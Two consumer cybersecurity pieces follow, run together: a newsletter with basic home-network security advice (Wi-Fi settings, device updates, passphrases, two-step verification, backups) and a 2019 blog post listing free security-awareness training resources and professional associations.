Almost every home network starts with a wireless (or Wi-Fi) network. This is what enables all your devices to connect to the Internet. Most home wireless networks are controlled by your Internet router or a separate, dedicated wireless access point. They both work the same way: by broadcasting wireless signals. The devices in your house can then connect via these signals. This means securing your wireless network is a key part of protecting your home. We recommend the following steps to secure it:

Change the default administrator password to your Internet router or wireless access point. (Whichever one is controlling your wireless network.) The admin account is what allows you to configure the settings for your wireless network. Ensure that only people you trust can connect to your wireless network. Do this by enabling strong security. Currently, the best option is to use the security mechanism called WPA2. By enabling this, a password is required for people to connect to your home network, and once connected, their online activities are encrypted. Ensure the password used to connect to your wireless network is strong and that it is different from the admin password. Remember, you only need to enter the password once for each of your devices, as they store and remember the password. Many wireless networks support what is called a Guest Network. This allows visitors to connect to the Internet, but protects your home network, as they cannot connect to any of the other devices on your home network. If you add a guest network, be sure to enable WPA2 and a unique password for the network.

Not sure how to do these steps? Ask your Internet Service Provider or check their website, check the documentation that came with your Internet router or wireless access point, or refer to their respective website.

Your Devices

The next step is knowing what devices are connected to your wireless home network and making sure all of those devices are secure. This used to be simple when you had just a computer or two. However, almost anything can connect to your home network today, including your smartphones, TVs, gaming consoles, baby monitors, speakers, or perhaps even your car. Once you have identified all the devices on your home network, ensure that each one of them is secure. The best way to do this is ensure you have automatic updating enabled on them wherever possible. Cyber attackers are constantly finding new weaknesses in different devices and operating systems. By enabling automatic updates, your computer and devices are always running the most current software, which makes them much harder for anyone to hack into.

Passwords

The next step is to use a strong, unique password for each of your devices and online accounts. The key words here are strong and unique. Tired of complex passwords that are hard to remember and difficult to type? So are we. Use a passphrase instead. This is a type of password that uses a series of words that is easy to remember, such as “Where is my coffee?” or “sunshine-doughnuts-happy-lost”. The longer your passphrase is, the stronger. A unique password means using a different password for each device and online account. This way, if one password is compromised, all your other accounts and devices are still safe. Can’t remember all those strong, unique passwords? Don’t worry, neither can we. That is why we recommend you use a password manager, which is a special security program that securely stores all your passwords for you in an encrypted, virtual safe.

Finally, enable two-step verification whenever available, especially for your online accounts. Two-step verification is much stronger. It uses your password, but also adds a second step, such as a code sent to your smartphone or an app on your smartphone that generates the code for you. Two-step verification is probably the most important step you can take to protect yourself online, and it’s much easier than you think.

Backups

Sometimes, no matter how careful you are, you may be hacked. If that is the case, often the only way you can recover your personal information is to restore from backup. Make sure you are doing regular backups of any important information and verify that you can restore from them. Most mobile devices support automatic backups to the Cloud. For most computers, you may have to purchase some type of backup software or service, which are relatively low- priced and simple to use.

License

OUCH! newsletter is under the Creative Commons license.  You are free to share / distribute it but may not sell or modify it.

Cybersecurity training and awareness: helpful resources for educators

Free resources for cybersecurity awareness and training are out there – links to many of them are provided here

Cybersecurity training and awareness programs need not break the budget. This article lists free resources that are readily accessible and can help you find ideas, content, and contacts to assist in your efforts.

Of course, as I said last year, such programs “will not guarantee complete cyber safety for companies, but they can go a long way towards making workers more cyber-aware” (see: Cybersecurity training still neglected by many employers). When combined with good policies and controls, security education definitely improves an organization’s resistance to attack.

Over the past 12 months I think I have seen an increase in the number of hands raised when I ask audiences: “Has your employer provided you with any training and education around cybersecurity?” If this is a real trend, not just an anecdotal result of my informal research, then I am encouraged. But to be clear, I am not claiming any personal credit for such a trend – there are many dedicated infosec professionals doing far more than I to advance the worthy cause of security training and awareness.

I was fortunate to meet some of these folks last week at an event called Security Professionals Conference 2019 presented by EDUCAUSE, the  nonprofit association that helps higher education “elevate the impact of IT.” I was honored to serve on a panel consisting of myself, Robert Jorgensen, Cybersecurity Program Director and Assistant Professor at Utah Valley University, and Kelvin Coleman, Executive Director of the National Cyber Security Alliance. The panel was titled “Cybersecurity Woke: Effecting Positive Change Through Outreach and Education” and it was skillfully moderated by Bob Turner, the CISO of the Univeristy of Wisconsin-Madison.

At the end of the session I promised the audience that I would share – here on WeLiveSecurity – links to the awareness and training resources that I had curated, so that anyone who is interested can easily find them. I hope at least some of these prove to be helpful. If you know of others, please consider adding them in the Discussion section below.

Resources: government and non-profit A great place to start is the National Cyber Security Alliance or NCSA. This is the US non-profit behind a number of key initiatives over the last ten years, including National Cybersecurity Awareness month and the Stay Safe Online campaigns. You can find a host of resources on their website. The Office of the Director of National Intelligence is part of the US federal government that values all forms of security awareness and offers several public domain resources under the program called: Know the Risk Raise Your Shield. This interactive page is one place to start. That is the first in a three part course described here. There are also posters and some pretty funny videos. The Department of Health and Human Services has an interesting 60-page interactive PDF available online for cybersecurity training. While it has a departmental focus on Personally Identifiable Information (PII), Protected Health Information (PHI), and Personal Identity Verification (PIV) cards, it is still helpful, and particularly so if your organization has a medical component (e.g. medical school or healthcare clients). The Center for Cyber Safety and Education is run by (ISC)2, one of the leading cybersecurity non-profits, about which there is more info below. Resources: outside of government but still free The Infosec Institute is one of a number of for-profit organizations that offer both paid and free awareness materials, the latter obviously being a great way to introduce people to the organization’s capabilities. Despite a slightly strange name, this “Marine Lowlifes Campaign Kit” is well worth exploring. SecureWorld puts on security events and provides a portal for curated vendor materials, such as this webinar on phishing, produced by Proofpoint. Another useful webinar is this one Business Email Compromise from KnowBe4. (And yes, according to REN-ISAC, criminals are targeting higher education institutions with BEC.) ESET offers a free cybertraining course that I have written about here, and talked about here. You can access it here. (Like the other resources in this section, registration is required, but participants can download a certificate of completion, which helps managers track who has taken the training.) Resources: community of support

A few years ago I joined something called Peerlyst, which describes itself as a “place where security experts share their knowledge, learn from each other, and build their reputation.” Although it is not a non-profit, a lot of free resources have been posted in its wiki-style website. Here are some that I think may be useful in the current context:

A project to crowdsource a security awareness training checklist

The 9 Security Awareness Training Topics Your Employees Need for 2019! – Emma Woods

The 6 things MSP’s Need To Look Out For When Investing in Security Awareness Training – Emma Woods

A list of open source, free and paid phishing campaign toolkits

Free 15 minutes training video: Threat Landscape – IoT, Cloud, and Mobile

Resources: the power of associations

There are quite a few security-related associations that you may be able to tap for help with your security training and awareness program. Looking for an expert to come speak to your employees or students? Want to connect with other people working on cybersecurity? in your sector? in your area? One of the following might have what you’re looking for.

ISACs: these are the Information Sharing and Analysis Centers, non-profits that “provide a central resource for gathering information on cyber threats to critical infrastructure and providing two-way sharing of information between the private and public sector.” There is probably one for your part of the economy. For example, if you are in education, then REN-ISAC is the one you need to know about. This page at the National Council of ISACS will lead you to them all.

Infragard: this is the public-private partnership spearheaded by the FBI and now accessible via 82 chapters around the country. Joining requires vetting, but the benefits are well worth the effort. You can apply here.

ISSA: this is the Information Systems Security Association and it offers you “a network of 10,000 colleagues worldwide to support you in managing technology risk.” There are many chapters around the world.

ISACA: previously known as the Information Systems Audit and Compliance Association, it serves 140,000 professionals in 180 countries, so there is probably a chapter near you.

(ISC)2: you probably know the International Information System Security Certification Consortium (ISC squared, get it?), from its well-known CISSP qualification, but this educational non-profit membership organization does a lot more than that. Check out the website.

CompTIA: while security is not the sole focus of this non-profit computer trade industry association and certification body, it can be a great source of information about cybersecurity. Consider connecting with the IT Security Community.

21 May 2019 – 05:33PM